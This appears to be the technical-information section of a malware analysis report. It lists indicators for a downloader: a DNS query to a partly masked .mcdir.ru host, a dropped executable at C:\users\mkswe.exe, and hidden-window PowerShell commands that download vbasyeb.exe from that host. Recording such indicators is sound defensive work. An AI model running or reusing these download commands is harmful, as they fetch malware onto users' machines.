Technical Information
- http://ve#####rash.mcdir.ru/panel/___soft/vbasyeb.exe as c:/users/mkswe.exe
- C:\users\mkswe.exe
- http://ve#####rash.mcdir.ru/panel/___soft/vbasyeb.exe
- DNS ASK ve#####rash.mcdir.ru
- 'C:\users\mkswe.exe'
- '<SYSTEM32>\cmd.exe' /C powershell -Command "(New-Object Net.WebClient).DownloadFile('http://ve#####rash.mcdir.ru/panel/___soft/vbasyeb.exe', 'C:/Users/mkswe.exe')"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C powershell -Command "(New-Object Net.WebClient).DownloadFile('http://ve#####rash.mcdir.ru/panel/___soft/vbasyeb.exe', 'C:/Users/mkswe.exe')"